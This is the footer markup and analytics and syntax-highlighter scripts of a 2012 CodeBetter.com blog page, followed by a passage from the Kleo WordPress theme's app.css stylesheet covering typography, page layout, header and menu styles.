href="http://www.codekana.com/">Codekana</a> </li> <li><a href="http://www.devexpress.com/" target="_blank">DevExpress</a></li> <li><a href="http://nhprof.com" target="_blank">NHibernate Profiler</a></li> <li><a href="http://unfuddle.com" target="_blank">Unfuddle</a></li> <li><a href="http://www.balsamiq.com/products/mockups" target="_blank">Balsamiq Mockups</a></li> <li><a href="http://scrumy.com" target="_blank">Scrumy</a></li> <li><a href="http://umbraco.com" target="_blank">Umbraco</a></li> <li><a href="http://nservicebus.com" target="_blank">NServiceBus</a></li> <li><a href="http://ravendb.net" target="_blank">RavenDb</a></li> <li><a href="http://www.websequencediagrams.com/" target="_blank">Web Sequence Diagrams</a></li> </ul> </div><!-- #third .widget-area --> <div class="grid_4"> CodeBetter.Com &copy; '12<br /> Stuff you need to Code Better!<br /> Proudly powered by <span id="generator-link"><a href="http://wordpress.org/" title="Semantic Personal Publishing Platform" rel="generator">WordPress</a></span>. </div><!-- #fourth .widget-area --> </div><!-- #footer-widget-area --> </div><!-- end div.container_12 --> </div><!-- end div#footer --> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-531207-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js?ver=3.0.83b'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushCSharp.js?ver=3.0.83b'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushRuby.js?ver=3.0.83b'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushJScript.js?ver=3.0.83b'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushXml.js?ver=3.0.83b'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPython.js?ver=3.0.83b'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/third-party-brushes/shBrushFSharp.js?ver=3.0.83b'></script> <script type='text/javascript'> (function(){ var corecss = document.createElement('link'); var themecss = document.createElement('link'); var corecssurl = "http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver=3.0.83b"; if ( corecss.setAttribute ) { corecss.setAttribute( "rel", "stylesheet" ); corecss.setAttribute( "type", "text/css" ); corecss.setAttribute( "href", corecssurl ); } else { corecss.rel = "stylesheet"; corecss.href = corecssurl; } document.getElementsByTagName("head")[0].insertBefore( corecss, document.getElementById("syntaxhighlighteranchor") ); var themecssurl = "http://cdn1.codebetter.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?ver=3.0.83b"; if ( themecss.setAttribute ) { themecss.setAttribute( "rel", "stylesheet" ); themecss.setAttribute( "type", "text/css" ); themecss.setAttribute( "href", themecssurl ); } else { themecss.rel = "stylesheet"; themecss.href = themecssurl; } //document.getElementById("syntaxhighlighteranchor").appendChild(themecss); document.getElementsByTagName("head")[0].insertBefore( themecss, document.getElementById("syntaxhighlighteranchor") ); })(); SyntaxHighlighter.config.strings.expandSource = '+ expand source'; SyntaxHighlighter.config.strings.help = '?'; SyntaxHighlighter.config.strings.alert = 'SyntaxHighlighter\n\n'; SyntaxHighlighter.config.strings.noBrush = 'Can\'t find brush for: '; SyntaxHighlighter.config.strings.brushNotHtmlScript = 'Brush wasn\'t configured for html-script option: '; SyntaxHighlighter.defaults['gutter'] = false; SyntaxHighlighter.defaults['tab-size'] = 2; SyntaxHighlighter.defaults['toolbar'] = false; SyntaxHighlighter.defaults['wrap-lines'] = true; SyntaxHighlighter.defaults['pad-line-numbers'] = false; SyntaxHighlighter.all(); </script> <script type='text/javascript'>//<![CDATA[ if (typeof jQuery == 'undefined') { document.write(unescape("%3Cscript src='http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.2.min.js' type='text/javascript' %3E%3C/script%3E")); }//]]></script> <script type='text/javascript' language='Javascript' src='http://s1.lqcdn.com/m.min.js?dt=2.3.110202.1'></script> <script type='text/javascript' language='Javascript'> if(jQuery.LqmAds)jQuery.LqmAds();</script> </body> </html> <!-- Dynamic page generated in 0.345 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2012-11-26 14:56:24 -->
wp-content/themes/kleo/assets/css/app.css
NYU-SPIKE/spikebook
/* -------------------------------------------------- Table of Contents ----------------------------------------------------- */ /* Theme Name: Kleo Template Description: A multipurpose WordPress template Author: SeventhQueen Author URI: http://themeforest.net/user/SeventhQueen/portfolio?ref=SeventhQueen Tags: clean, responsive, creative, minimal, modern, landing page, bootstrap 3 01. Shared Styles 02. Page Template 03. Boxed Page 04. Page Sections 05. WordPress Styles 06. Font Icons Core 07. Visual Composer Extra class names 08. Retina Ready CSS Graphics 09. Media Queries 10. Shortcodes */ /* ----------------------------------------- 01. Shared Styles ----------------------------------------- */ body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, p, th, td { direction: ltr; } html,body { overflow-x: hidden; } body { /*background-image: url('../img/bg-body.gif');*/ /*font-family: 'Open Sans', sans-serif;*/ font-size: 13px; line-height: 22px; overflow: hidden; } /* Typography */ h1,h2,h3,h4,h5,h6 { margin: 10px 0; font-weight: 300; line-height: 22px; text-rendering: optimizelegibility; } h1.title { font-size:46px; line-height:48px; font-weight:300; margin-bottom:25px; } h2.title { font-size:36px; line-height:48px; font-weight:300; margin-bottom:30px; } h1 { font-size: 36px; line-height:48px; margin-bottom: 25px; } h2 { font-size: 28px; line-height:36px; margin-bottom: 20px; } h3 { font-size: 22px; line-height:28px; margin-bottom: 20px; } h4 { font-size: 18px; line-height:28px; margin-bottom:10px; } h5 { font-size: 17px; line-height:27px; margin-bottom:10px; } h6 { font-size: 16px; line-height:24px; margin-bottom:10px; } h1.intro { color:#89949b; line-height:40px; font-weight:300; margin-bottom:60px; } p + h1, p + h2, p + h3, p + h4, p + h5, p + h6{ margin-top: 1.5em; } p { margin: 0.85em 0; } .btn + .btn { margin-left: 10px; } select + select { margin-left: 5px !important; } .lead { /*font-family: sans-serif;*/ margin-bottom: 20px; font-size: 18px; font-weight: 200; line-height: 30px; } .muted, h1.muted a { color: #bbb; } a.muted:hover, a.muted:focus { color: #7f8c8d; } .text-warning { color: #f1c40f; } a.text-warning:hover, a.text-warning:focus { color: #f39c12; } .text-error { color: #e74c3c; } a.text-error:hover, a.text-error:focus { color: #c0392b; } .text-info { color: #3498db; } a.text-info:hover, a.text-info:focus { color: #2980b9; } .text-success { color: #1abc9c; } a.text-success:hover, a.text-success:focus { color: #16a085; } a:focus, a:hover { outline: none; text-decoration: none; transition: all 0.3s ease-in-out 0s; } img { max-width: 100%; height: auto; -ms-interpolation-mode: bicubic; } img[alt] { font-size: 82%; line-height: 10px; } .inline-image { display: inline-block; margin: 0 5px; } iframe, object, embed, video { max-width: 100%; border: none; /*height: auto;*/ } .adsbygoogle iframe { height: inherit; } audio, video { width: 100%; } pre { clear:none; border: 1px solid #f7f7f7; border-left: 3px solid #e5e5e5; color: #777; overflow:auto; /*padding:2em;*/ line-height: 2em; font-size: 12px; background-color: #fff; /*background-image: -webkit-linear-gradient(rgba(0, 0, 0, .02) 50%, transparent 50%, transparent); background-image: -moz-linear-gradient(rgba(0, 0, 0, .02) 50%, transparent 50%, transparent); background-image: -ms-linear-gradient(rgba(0, 0, 0, .02) 50%, transparent 50%, transparent); background-image: -o-linear-gradient(rgba(0, 0, 0, .02) 50%, transparent 50%, transparent); background-image: linear-gradient(rgba(0, 0, 0, .02) 50%, transparent 50%, transparent);*/ -webkit-background-size: 100% 4em ; -moz-background-size: 100% 4em ; background-size: 100% 4em; -webkit-transition: all ease-in-out 0.5s; -moz-transition: all ease-in-out 0.5s; -o-transition: all ease-in-out 0.5s; transition: all ease-in-out 0.5s; margin-bottom: 30px; position: relative; left:0; text-transform: none; width:auto; } label { font-weight: normal; } ins { text-decoration: none; } /* TO DO */ .all-classes { transition: all 0.25s ease-out 0s; } /* Useful classes*/ .no-padd { padding: 0; } .no-bot-padd { padding-bottom: 0; } .no-margin { margin: 0; } .no-border { border: none; } .no-bot-margin { margin-bottom: 0; } .small-text { font-size: 12px; } .strong { font-weight: bold; } .alignleft { float: left; margin: 5px 30px 10px 0; } .alignright { float: right; margin: 5px 0 10px 30px; } .aligncenter { display: block; margin: 5px auto 10px auto; } .alignnone { float: none; margin: 5px auto 10px auto; } .ov-hidden { overflow: hidden; } .kleo-rounded { border-radius: 100%; } .kleo-rounded img.avatar { border-style: solid; border-width: 5px; border-radius: 100%; } .custom-color .kleo-rounded img.avatar { border-color: rgba(255,255,255, 0.3) !important; } .text-left { text-align: left; } /* ----------------------------------------- 02. Page Template ----------------------------------------- */ .wpb_wrapper section { background-color: transparent; } #footer { position: relative; } .border-top { border-top-style:solid; border-top-width:1px; } .border-left { border-left-style:solid; border-left-width:1px; } .border-right { border-right-style:solid; border-right-width:1px; } .border-bottom { border-bottom-style:solid; border-bottom-width:1px; } .container-wrap.bg-full-width, .container-wrap.bg-full-width + .container-wrap { border-top: none; } .container .container { padding: 0; } .template-page { border-right-style: solid; border-right-width: 1px; } #footer .template-page { border: none; } .template-page, .sidebar { padding-top:40px; padding-bottom:40px; min-height: 1; } .wrap-content {} .wpb_wrapper { clear: both; position: relative; } .container-full { padding: 0; } .container-full:before, .container-full:after { display: table; content: " "; } .container-full:after { clear: both; } .container-full .template-page.col-sm-12 { padding: 0; } .template-page.tpl-no { border-right: 0; } .template-page.tpl-right .wrap-content { padding-right: 35px; } .template-page.no .wrap-content { padding-right: 0; } .template-page.col-sm-push-3 .wrap-content { padding-right: 0; padding-left: 35px; } .page-boxed .template-page.tpl-left .wrap-content, .page-boxed .template-page.tpl-right .wrap-content { padding-left: 17.5px; padding-right: 17.5px; } .page-boxed .sidebar-left .inner-content, .page-boxed .sidebar-right .inner-content { padding-left: 17.5px; padding-right: 17.5px; } .template-page.tpl-3ll .wrap-content, .template-page.tpl-3lr .wrap-content, .sidebar-main.sidebar-3rr .inner-content, .sidebar-extra.sidebar-3lr .inner-content, .sidebar-extra.sidebar-3rr .inner-content, .sidebar-extra.sidebar-3ll .inner-content { padding-left: 15px; } .template-page.tpl-3lr .wrap-content, .template-page.tpl-3rr .wrap-content, .sidebar-main.sidebar-3lr .inner-content, .sidebar-main.sidebar-3ll .inner-content, .sidebar-main.sidebar-3rr .inner-content, .sidebar-extra.sidebar-3ll .inner-content { padding-right: 15px; } .sidebar-left .inner-content { padding-right: 35px; } .sidebar-right .inner-content { padding-left: 35px; } .template-page.tpl-3ll .wrap-content { padding-right: 0; } .template-page.tpl-left, .template-page.tpl-3ll, .sidebar-extra.sidebar-3ll, .sidebar-extra.sidebar-3lr, .sidebar-extra.sidebar-3rr { border-right: none; border-left-style: solid; border-left-width: 1px; } .sidebar-right, .sidebar-main.sidebar-3rr { border-left-style:solid; border-left-width:1px; } .sidebar-left, .sidebar-extra.sidebar-3ll, .sidebar-main.sidebar-3ll, .sidebar-main.sidebar-3lr, .sidebar-main.sidebar-3rr{ border-right-style:solid; border-right-width:1px; } .sidebar-right, .sidebar-main.sidebar-3rr, .sidebar-extra.sidebar-3rr { margin-left: -1px; } .template-page.with-meta .article-content .wpb_wrapper:first-child, .standard-listing.with-meta .article-media .mejs-container { clear: right; } /* Equal height columns fix */ #main-container > .row { overflow: hidden; } #main-container .template-page.tpl-3ll, #main-container .sidebar.sidebar-3ll, #main-container .template-page.tpl-3rr, #main-container .sidebar.sidebar-3rr, #main-container .template-page.tpl-3lr, #main-container .sidebar.sidebar-3lr { margin-bottom: -99999px; padding-bottom: 99999px; } .no-col-gap .row { margin-left: 0; margin-right: 0; } .no-col-gap .col-sm-1, .no-col-gap .col-sm-2, .no-col-gap .col-sm-3, .no-col-gap .col-sm-4, .no-col-gap .col-sm-5, .no-col-gap .col-sm-6, .no-col-gap .col-sm-7, .no-col-gap .col-sm-8, .no-col-gap .col-sm-9, .no-col-gap .col-sm-10, .no-col-gap .col-sm-11, .no-col-gap .col-sm-12 { padding: 0; padding: 0; } .vertical-col .col-sm-1, .vertical-col .col-sm-2, .vertical-col .col-sm-3, .vertical-col .col-sm-4, .vertical-col .col-sm-5, .vertical-col .col-sm-6, .vertical-col .col-sm-7, .vertical-col .col-sm-8, .vertical-col .col-sm-9, .vertical-col .col-sm-10, .vertical-col .col-sm-11, .vertical-col .col-sm-12 { float: none; display: table-cell; vertical-align: middle; } .vertical-col .col-sm-1 .wpb_single_image img, .vertical-col .col-sm-2 .wpb_single_image img, .vertical-col .col-sm-3 .wpb_single_image img, .vertical-col .col-sm-4 .wpb_single_image img, .vertical-col .col-sm-5 .wpb_single_image img, .vertical-col .col-sm-6 .wpb_single_image img, .vertical-col .col-sm-7 .wpb_single_image img, .vertical-col .col-sm-8 .wpb_single_image img, .vertical-col .col-sm-9 .wpb_single_image img, .vertical-col .col-sm-10 .wpb_single_image img, .vertical-col .col-sm-11 .wpb_single_image img, .vertical-col .col-sm-12 .wpb_single_image img { width: 100%; } .vertical-col .col-sm-12.column_container { display: block; } .vertical-col .container-full .row:first-child, .vertical-col > .section-container .row:first-child { display: table; width: 100%; } /* Temp */ .section-container.container > .row { /*overflow: hidden;*/ } section.container-wrap.border-right, section.container-wrap.border-left { margin-bottom: -99999px !important; padding-bottom: 99999px !important; } /* ----------------------------------------- 03. Boxed Page ----------------------------------------- */ .page-boxed { box-shadow: 0 0 3px rgba(153, 153, 153, 0.1); max-width: 1440px; min-width: 300px; margin: 0 auto; position: relative; } /*.fixed-header .page-boxed #main { padding-top: 101px; }*/ .page-boxed #main { } .fixed-header .page-boxed .social-header { } .kleo-navbar-fixed .page-boxed .kleo-main-header { /*max-width: 1280px;*/ width: 100%; /* Still need this for IE */ max-width: 1440px; margin: 0 auto; } @media (min-width: 1200px) { } /* ----------------------------------------- 04. Page Sections ----------------------------------------- */ /* General Main Section */ .kleo-page {} #main { clear: both; margin-top: -1px; } .main-title { padding: 10px 0; } .main-title .page-title { float: left; clear:left; } .template-page .page-title { float: none; } .main-title .breadcrumb { font-size: 12px; background-color: transparent; border-radius: none; list-style: none outside none; margin-bottom: 0; padding: 0; float: left; clear: left; } .breadcrumb .sep { padding: 0 3px; } .breadcrumb .sep:before { content: "/"; } .title-single { padding-bottom: 10px; } .main-title h1 { font-size: 26px; line-height: 34px; margin: 0; } .page-info { clear: right; float: right; font-size: 12px; margin: 0; } /* Center Title & Infos */ .main-center-title { text-align: center; } .main-center-title .page-title { float: none; display: block; } .main-center-title .breadcrumb-extra { display: block; padding: 10px 0; } .main-center-title .breadcrumb { float: none; } .main-center-title .page-info { float: none; } /* Left Title - Right Infos */ .main-right-breadcrumb.main-title .container { display: table; width: 100%; } .main-right-breadcrumb.main-title .page-title { display: table-cell; vertical-align: middle; float: none; } .main-right-breadcrumb .breadcrumb-extra { display: table-cell; vertical-align: middle; } .main-right-breadcrumb .breadcrumb { float: right; } .form-control, .form-control:focus { border-style: solid; border-width: 1px; outline: 0; box-shadow: none; -webkit-box-shadow: none; -webkit-appearance: none; } .bg-parallax { background-attachment: fixed; background-position-x: 50%; } .bg-full-width { -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } /* Video background */ .bg-full-video .container, .bg-full-video .container-full { position: relative; z-index: 1; pointer-events:none; } .bg-full-video { padding: 0 !important; position: relative; } .bg-full-video .mejs-container { width: auto !important; height: auto !important; overflow: hidden; position: static; } .bg-full-video .mejs-mediaelement { position: relative; } .bg-full-video .mejs-container video { width: 100%; height: auto !important; max-width: none; } .no-video-controls .mejs-controls, .no-video-controls .mejs-overlay-play { display: none !important; } .bg-full-video .mejs-poster.mejs-layer { background-size: cover; width: 100% !important; height: 100% !important; } .video-wrap { height: 100%; left: 0; overflow: hidden; position: absolute; top: 0; width: 100%; z-index: 0; } .video-wrap video { min-height: 100%; min-width: 100%; } /* TODO single video hosted - Flash fallback */ .kleo-video-wrap { /*overflow: hidden;*/ } /*.kleo-video-wrap .mejs-mediaelement { position: relative; }*/ /*.kleo-video-wrap .mejs-container { width: 100% !important; height: auto !important; }*/ /* .kleo-video-wrap .mejs-mediaelement .me-plugin { position: relative; width: 100% height: 100%; } .kleo-video-wrap .mejs-mediaelement .me-plugin embed { width: 100% !important; height: 100% !important; } */ #main .mejs-container-fullscreen .mejs-mediaelement, #main .mejs-container-fullscreen video { height: auto !important; } /* 1. No object-fit support: */ @media (min-aspect-ratio: 16/9) { .bg-full-video > video { height: 300%; top: -100%; } } @media (max-aspect-ratio: 16/9) { .bg-full-video > video { width: 300%; left: -100%; } } /* 2. If supporting object-fit, overriding (1): */ @supports (object-fit: cover) { .bg-full-video > video { top: 0; left: 0; width: 100%; height: 100%; object-fit: cover; } } /* Header Section */ div .logo { float: left; } .logo, .logo a { display: block; height: 100%; /*overflow: hidden;*/ position: relative; font-size: 22px; font-weight: 100; width: auto; } .logo img { /*display: block;*/ /*height: 100%;*/ margin-top: -6px; max-height: 100%; width: auto; } .logo a, .logo img { -moz-transition: none; -webkit-transition: none; -o-transition: none; transition: none; } .social-header { border-bottom-style: solid; border-bottom-width: 1px; } .top-bar { font-size: 12px; /*height: 33px;*/ line-height: 33px; } .top-bar:before, .top-bar:after { display: table; content: " "; } .top-bar:after { clear: both; } .top-bar:before, .top-bar:after { display: table; content: " "; } .top-bar:after { clear: both; } .top-bar .dropdown-menu { left: -4px; } .top-bar .tabdrop .dropdown-menu { left: auto; right: 0; } /* Top Social Icons */ #top-social { position: relative; height: 33px; } #top-social ul { padding-left: 0; } #top-social > ul { height:33px; } #top-social li { margin-left: 0; padding-left: 0; } #top-social li, #top-social li a, #top-social li i, #top-social li .ts-text { display: inline-block; position: relative; width: 33px; height: 33px; line-height:33px; text-align: center; -webkit-transition: ease 0.5s; -moz-transition: ease 0.5s; -o-transition: ease 0.5s; transition: ease 0.5s; } #top-social li, #top-social li a, #top-social li .ts-text { float: left; width: auto; overflow: hidden; } #top-social li .ts-text { opacity: 0; } #top-social li a { width: 33px; line-height: 33px; border-right-width: 1px; border-right-style: solid; margin-left: 1px; } #top-social li:last-child a { border-right: none; } #top-social li:hover, #top-social li a:hover { text-decoration: none; } #top-social li a:hover .ts-text { opacity: 1; } #top-social li i { float: left; } #top-social li.tabdrop {overflow: visible;} #top-social .dropdown-menu li, #top-social .dropdown-menu li a, #top-social .dropdown-menu li .ts-text { opacity: 1; padding: 0; } #top-social .dropdown-menu li, #top-social .dropdown-menu li a {width: 100%} #top-social .tabdrop:before { border-left-style: solid; border-left-width: 1px; content: "\e97c"; display: block; font: 16px "fontello"; height: 33px; margin-left:-1px; padding-top: 8px; pointer-events: none; position: absolute; text-align: center; transition: all 0.4s ease-in-out 0s; width: 35px; z-index: 12; } #top-social > ul li.tabdrop a {border:none;} #top-social > ul li.tabdrop.open .dropdown-menu a {width: 100% !important;} /* Icon Shortcode */ a .link-icon { display: inline-block; margin: 0 10px; } /* Top Meniu Links */ .top-menu > ul { margin: 0; padding: 0; text-align: right; } .top-menu li { display: inline-block; } .top-menu li.has-submenu { position: relative; } .top-menu li > a { line-height: 33px; border-right-width: 1px; border-right-style: solid; display: inline-block; padding: 0 8px; } .top-menu li > a:hover {} .top-menu li:last-child > a { border-right: none; } .top-menu .dropdown-menu a { border: none; display: block; line-height: 20px; padding: 5px 18px; } .top-menu .dropdown-menu a:hover{} .top-menu ul li ul { text-align: left; } .top-menu .dropdown-menu { font-size: 12px; margin: 0; padding: 0; border: 1px solid #e5e5e5; border-radius: none; box-shadow: 1px 1px 3px rgba(102, 102, 102, 0.1); min-width: 160px; } .top-menu .caret { margin-right: 6px; } .top-menu .caret:after { top: 0; } .top-menu .dropdown-menu li { display: block; } .top-menu .dropdown-menu li:last-child { border-bottom: none; } .top-menu .tabdrop:before { border-left-style: solid; border-left-width: 1px; content: "\e97c"; display: block; font: 16px "fontello"; height: 33px; padding-top: 7px; pointer-events: none; position: absolute; text-align: center; transition: all 0.4s ease-in-out 0s; width: 35px; z-index: 12; } .top-menu .tabdrop > .dropdown-toggle { width: 35px; } .top-menu li.bp-login-nav a:before, .top-menu li.bp-register-nav a:before { font-family: "fontello"; float: left; display: inline-block; margin-right: 5px; } .top-menu li.bp-login-nav a:before { content: "\e83b"; } .top-menu li.bp-register-nav a:before { content: "\e82b"; } /* Nav Menu */ #header .is-sticky .kleo-main-header { animation-fill-mode: both; -webkit-backface-visibility: hidden; /*backface-visibility: hidden;*/ /*transition: all 0.3s ease-in-out 0s;*/ } #header .kleo-main-header .container { animation-fill-mode: both; transition: all 0.3s ease-in-out 0s; -webkit-transition: all 0.3s ease-in-out 0s; } .navbar .kleo-main-header { padding-right: 0; padding-left: 0; margin-bottom: 0; border-radius: none; border-bottom-style: solid; border-bottom-width: 1px; } .navbar { margin-bottom: 0; border: none; } .navbar-header, .kleo-main-header .navbar-collapse > ul > li > a, .header-banner{ line-height: 88px; } .kleo-main-header .nav.navbar-nav { line-height: normal; } .navbar-header { /* Chrome fix */ -webkit-transform: translateZ(0); } .navbar-header .logo{ float:left; } .navbar-toggle { position: relative; float: none; padding: 9px 10px; margin-top: 0; margin-bottom: 8px; background-color: transparent; border-radius: 4px; } .navbar-toggle:hover, .navbar-toggle:focus { background-color: red; } .navbar-toggle .icon-bar { display: block; width: 22px; height: 2px; border-radius: 1px; } .navbar-collapse { box-shadow: none; } .navbar-collapse ul {} .navbar-collapse.nav-collapse {} .nav-collapse ul:first-child > li {} .nav-collapse.collapse {} .nav-collapse ul:first-child > li { float: none; display: inline-block; } .navbar .nav {} .navbar .nav li.dropdown.open > .dropdown-toggle, .navbar .nav li.dropdown.active > .dropdown-toggle, .navbar .nav li.dropdown.open.active > .dropdown-toggle, .nav-collapse ul:first-child > li > a:hover {} .navbar-nav > li {} .navbar-nav > li > a { margin: 0 12px; padding: 0; line-height: 20px; border-radius: 0; font-size: 12px; } .nav > li > a:hover, .nav > li > a:focus { background-color: transparent; } .nav .open > a, .nav .open > a:hover, .nav .open > a:focus { background-color: transparent; border: none; } .navbar .nav li a em, .widget_nav_menu li a em { background: #00B9F7; color: #fff; border-radius: 2px; font: 10px Arial, Helvetica, sans-serif; padding: 1px 3px; font-style: normal; /*font-weight: bold;*/ } .nav .open > a, .nav .open > a:hover {} .navbar-nav > .active > a, .navbar-nav > .active > a:hover, .navbar-nav > .active > a:focus {} .navbar-nav > li > .dropdown-menu { margin-top: 0; border-radius: none; font-size: 12px; } .btn-buy.btn-default {} .btn-buy.btn-default:hover { background-color: transparent; } .navbar-nav > li > a.btn-buy { padding: 0 12px; margin: 0; } .caret { display: inline-block; width: 0; height: 0; padding-left: 3px; vertical-align: middle; border: none; content: ""; } .caret:after { font-family: "fontello"; content: "\e8a1"; position: absolute; top: 0; /*top: 0;*/ } .dropdown-menu { position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 190px; list-style: none; border-radius: 0; margin: 0; padding: 0; border-style: solid; border-width: 1px; box-shadow: 1px 1px 3px rgba(102, 102, 102, 0.1); } .dropdown-menu li { display: block; border-bottom-style: solid; border-bottom-width: 1px; } .dropdown-menu li a { padding: 7px 18px; } .dropdown-menu li:last-child { border-bottom: none; } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a { text-decoration: none; background-image: none; } .dropdown-menu > .disabled > a, .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { color: #b6b5b5; } .dropdown-submenu { position: relative; } .dropdown-submenu > a .caret:after { content: "+"; position: absolute; right: 16px; top: 7px; } .dropdown-submenu > .dropdown-menu { top: -1px; margin-top: 0; border-radius: none; } .dropdown-submenu:hover > .dropdown-menu { /* display: block;*/ } .dropdown-submenu.pull-left { float: none; } .dropdown-submenu.pull-left > .dropdown-menu { left: -100%; margin-left: 10px; border-radius: none; } .dropdown-menu > .active > a, .dropdown-menu > .active > a:hover, .dropdown-menu > .active > a:focus {} .navbar .pull-right > li > .dropdown-menu:before, .navbar .nav > li > .dropdown-menu.pull-right:before { left: auto; right: 12px; } .navbar .pull-right > li > .dropdown-menu:after, .navbar .nav > li > .dropdown-menu.pull-right:after { left: auto; right: 13px; } .navbar .pull-right > li > .dropdown-menu .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-right .dropdown-menu { border-radius: none; left: auto; margin-left: 0; right: 100%; font-size: 12px; } .navbar .pull-left > li > .dropdown-menu .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-left .dropdown-menu { font-size: 12px; left: 100%; } .nav > li > a:hover, .nav > li > a:focus, .nav > li .dropdown-toggle a {} .kleo-main-header .navbar-collapse { float: right; } /*.kleo-main-header.header-normal .navbar-nav > li:last-child > a { margin-right: 0; }*/ .kleo-main-header.header-normal .navbar-collapse { padding-right: 0; } /* Center Logo & Menu */ .header-centered.kleo-main-header { text-align: center; } .header-centered .navbar-collapse, .header-centered .navbar-collapse .navbar-nav { float: none !important; } .header-centered .navbar-header { float: none; display: inline-block; } /* Right Logo */ .kleo-main-header.logo-to-right .navbar-collapse { float: left; padding-left: 0; } .logo-to-right .navbar-nav > li > a:first-child { margin-left: 0; } .logo-to-right .navbar-header { float: right; } /* Left logo & Menu below */ .kleo-main-header.header-left .navbar-collapse { float: none; clear: both; padding-left: 0; } .kleo-main-header.header-left .navbar-nav > li:first-child > a { margin-left: 0; } .header-banner { float: right; } .kleo-main-header.header-left.header-scrolled .navbar-collapse { clear: none; float: right; } .kleo-main-header.header-left.header-scrolled .navbar-nav > li:first-child > a { margin-left: 20px; } .kleo-main-header.header-left.header-scrolled .header-banner { display: none; } .kleo-main-header.header-left:not(.header-scrolled) .navbar-collapse > ul > li > a { line-height: 88px !important; } /* Megamenu */ .kleo-main-header .nav li.kleo-megamenu { position: static; } .kleo-main-header .nav li.kleo-megamenu ul .caret { opacity: 0; display:none; } .kleo-main-header .nav li.kleo-megamenu > .dropdown-menu { width: 100%; max-width: 1024px; padding: 20px 10px; margin: auto; position: absolute; right: 0; margin-top: -1px !important; } .is-sticky .kleo-main-header .nav li.kleo-megamenu > .dropdown-menu { margin-top: 0 !important; } .kleo-main-header .nav li.kleo-megamenu > ul.dropdown-menu > li { display: inline-block; float: left; } .kleo-main-header .nav li.kleo-megamenu.mega-2-cols > ul.dropdown-menu > li { width: 50%; } .kleo-main-header .nav li.kleo-megamenu.mega-3-cols > ul.dropdown-menu > li { width: 33.3%; } .kleo-main-header .nav li.kleo-megamenu.mega-4-cols > ul.dropdown-menu > li { width: 25%; } .kleo-main-header .nav li.kleo-megamenu.mega-5-cols > ul.dropdown-menu > li { width: 20%; } .kleo-main-header .nav li.kleo-megamenu.mega-6-cols > ul.dropdown-menu > li { width: 16.4%; } .kleo-main-header .nav li.kleo-megamenu.mega-2-cols, .kleo-main-header .nav li.kleo-megamenu.mega-3-cols{ position: relative; } .kleo-main-header .nav li.kleo-megamenu.mega-2-cols > .dropdown-menu { width: 400px; margin-left: -200px; } .kleo-main-header .nav li.kleo-megamenu.mega-3-cols > .dropdown-menu { margin-left: -320px; width: 640px; } .kleo-main-header .nav li.kleo-megamenu .dropdown-submenu ul { display: inline-block; width: 100%; float: left; } .kleo-main-header .nav li.kleo-megamenu .dropdown-submenu > a { text-transform: uppercase; font-weight: bold; font-size: 11px; } .kleo-main-header .nav li.kleo-megamenu .dropdown-submenu .dropdown-menu { display: block !important; position: relative; box-shadow: none; border: none; left: 0; } .navbar-transparent .kleo-main-header .nav li.kleo-megamenu .dropdown-submenu ul { background-color: transparent; } /* End Megamenu */ .kleo-mobile-icons { display: none; } .kleo-toggle-menu .notify-items { position: relative; } .kleo-mobile-switch { float: right; } /* Header With Transparency */ .navbar-transparent .navbar { border-bottom: none; } .navbar-transparent .navbar .navbar-nav {} .navbar-transparent .navbar .kleo-main-header { background-color: rgba(0,0,0, 0); /*transition: all 0.3s ease-in-out 0s;*/ } .navbar-transparent .header-color, .navbar-transparent .header-color .kleo-main-header { background-image: none; } /*.navbar-transparent .navbar .kleo-main-header:hover { background-color: rgba(0,0,0, 0.4); }*/ .navbar-transparent .navbar .kleo-main-header.header-scrolled { background-color: rgba(0,0,0, 0.4); } .navbar-transparent.on-light-bg .navbar .kleo-main-header.header-scrolled { transition: background-color 0.5s ease; background-color: #fff; box-shadow: 0 0 2px 0 rgba(0, 0, 0, 0.22); } .navbar-transparent #header .logo a, .navbar-transparent .navbar .navbar-nav > li > a, .navbar-transparent .navbar .navbar-nav .caret:after { /*color: #fff;*/ } .navbar-transparent.on-dark-bg #header .logo a, .navbar-transparent.on-dark-bg .navbar .navbar-nav > li > a, .navbar-transparent.on-dark-bg .navbar .navbar-nav .caret:after { color: #fff; } .navbar-transparent .navbar .navbar-nav > li > a span.kleo-notifications { /*color: #444444;*/ } .navbar-transparent.on-dark-bg {} .navbar-transparent.on-light-bg {} .social-header.header-color { background-image: none; } .navbar-transparent .navbar-nav > li > .dropdown-menu li, .navbar-transparent .navbar-nav > li > .dropdown-menu .dropdown-menu li { border-bottom-color: rgba(255,255,255, 0.1) !important; } .navbar-transparent .navbar-nav > li > .dropdown-menu li > a:hover, .navbar-transparent 